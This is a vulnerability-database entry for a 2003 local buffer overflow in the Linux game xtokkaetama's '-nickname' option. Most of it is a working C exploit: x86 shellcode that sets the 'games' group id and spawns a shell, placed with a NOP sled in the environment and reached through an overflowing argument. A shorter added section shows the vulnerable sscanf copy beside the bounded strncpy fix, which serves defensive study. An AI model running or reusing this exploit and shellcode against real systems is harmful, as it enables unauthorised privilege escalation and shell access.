Xtokkaetama 1.0 b-6 – Nickname Local Buffer Overflow (1)

Vulnerability ID: 1054070
Vulnerability type: (not given)
Published: 2003-08-04   Updated: 2003-08-04
CVE: N/A
CNNVD-ID: N/A
Platform: Linux   CVSS score: N/A

|Source
https://www.exploit-db.com/exploits/22984
|Details
Vulnerability details have not been disclosed.
|Exploit
source: http://www.securityfocus.com/bid/8337/info

xtokkaetama is prone to a locally exploitable buffer overflow vulnerability. This is due to insufficient bounds checking of the '-nickname' command line option, which could result in execution of arbitrary code in the context of the software. 

The software is typically installed setgid 'games'.

/* (linux/x86)xtokkaetama[v1.0b+]: (games) local buffer overflow exploit.
   by: v9[[email protected]]. (fakehalo)

   exploits an overflow missed in the patch/upgrade of:
    http://www.securityfocus.com/bid/8312

   fix:
    xtama_score.c:132: +strncpy(name,nickname,sizeof(name)-1);
    xtama_score.c:132: -sscanf( nickname , "%s",name ) ;

   (tested on non-debian, should still work elsewhere)
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <grp.h>
#include <sys/types.h>
#define PATH "/usr/games/xtokkaetama" /* game binary. */
static char exec[]= /* setgid(?)+shell. bytes 5 and 7 are patched with the gid below. */
 "\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31\xc0\xb0\x47\xcd"
 "\x80\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56"
 "\x07\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34"
 "\x12\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80"
 "\xe8\xd7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
int main(){
 unsigned int i;
 char *buf;
 struct group *gent;
 printf("(*)xtokkaetama[v1.0b+]: local buffer overflow exploit.\n");
 printf("(*)by: [email protected] / fakehalo.\n\n");
 if(!(buf=(char *)malloc(16384+1)))exit(1);
 memset(buf,0x90,(16384-strlen(exec)));           /* nop sled. */
 if(!(gent=getgrnam("games")))exec[5]=exec[7]=20; /* fallback gid if the 'games' group is missing. */
 else{exec[5]=exec[7]=gent->gr_gid;}
 strcat(buf,exec);
 setenv("EXEC",buf,1);                            /* sled+shellcode are placed in the environment. */
 memset(buf,0x0,(16384+1));
 for(i=0;i<512;i+=4){*(long *)&buf[i]=0xbfffe001;} /* -nickname argument. */
 printf("[*] in the game, hit: spacebar, \"Q\", spacebar, spacebar.\n");
 sleep(3);
 printf("[*] entering xtokkaetama...\n");
 if(execlp(PATH,PATH,"-nickname",buf,(char *)0))
  printf("[!] failed to execute %s.\n",PATH);
 exit(0);
}
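The root cause named above (the '-nickname' value copied into a fixed-size buffer without a bounds check) and the one-line fix quoted in the exploit header (`strncpy(name,nickname,sizeof(name)-1)` replacing `sscanf(nickname,"%s",name)`) are easy to see side by side. The following is an added example written for this page, not code from xtokkaetama or from the exploit author; `NAME_LEN`, `copy_nickname_unsafe`, `copy_nickname_safe`, `nickname_fits`, `short_copy_ok` and `demo` are assumed names, and the real size of `name` in `xtama_score.c` is not given on the page.

```c
/* Added example: unbounded sscanf("%s") copy beside the bounded fix the
 * page quotes. NAME_LEN is an assumption; the real buffer size is not
 * stated on the page. */
#include <stdio.h>
#include <string.h>

#define NAME_LEN 64 /* assumed buffer size for the nickname */

/* Vulnerable pattern: "%s" with no field width copies until whitespace,
 * regardless of how large `name` is. Kept only for comparison; never
 * call it with untrusted input. */
void copy_nickname_unsafe(char *name, const char *nickname) {
    sscanf(nickname, "%s", name);
}

/* Bounded copy in the spirit of the patch: strncpy(name, nickname,
 * sizeof(name)-1). strncpy does not write a NUL when the source is at
 * least n bytes long, so the terminator is written explicitly.
 * Returns 1 if the nickname was truncated, 0 otherwise. */
int copy_nickname_safe(char *name, size_t name_len, const char *nickname) {
    size_t src_len = strlen(nickname);
    strncpy(name, nickname, name_len - 1);
    name[name_len - 1] = '\0';
    return src_len > name_len - 1;
}

/* Pre-check a caller can apply to reject over-long input outright instead
 * of silently truncating it. Returns 1 if the nickname fits with room for
 * the terminator. */
int nickname_fits(const char *nickname, size_t name_len) {
    return strlen(nickname) < name_len;
}

/* A short nickname is copied verbatim and not reported as truncated. */
int short_copy_ok(void) {
    char name[NAME_LEN];
    int truncated = copy_nickname_safe(name, sizeof(name), "player");
    return truncated == 0 && strcmp(name, "player") == 0;
}

/* Constructed over-long nickname (4x the buffer): the safe copy keeps
 * exactly NAME_LEN-1 bytes, terminates the string, and reports truncation. */
int demo(void) {
    char name[NAME_LEN];
    char longnick[NAME_LEN * 4];
    memset(longnick, 'A', sizeof(longnick) - 1);
    longnick[sizeof(longnick) - 1] = '\0';

    int truncated = copy_nickname_safe(name, sizeof(name), longnick);
    return truncated == 1
        && strlen(name) == NAME_LEN - 1
        && nickname_fits(longnick, sizeof(name)) == 0;
}

int main(void) {
    printf("short nickname copied intact: %s\n", short_copy_ok() ? "yes" : "no");
    printf("over-long nickname bounded and terminated: %s\n", demo() ? "yes" : "no");
    return 0;
}
```

One caveat worth keeping in mind when applying the quoted fix: `sscanf("%s")` stops at the first whitespace while `strncpy` copies whitespace through, so the two are not behaviourally identical for names containing spaces; if the original parsing is wanted, `sscanf` with an explicit field width (for example `"%63s"` for a 64-byte buffer) is the matching bounded form.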
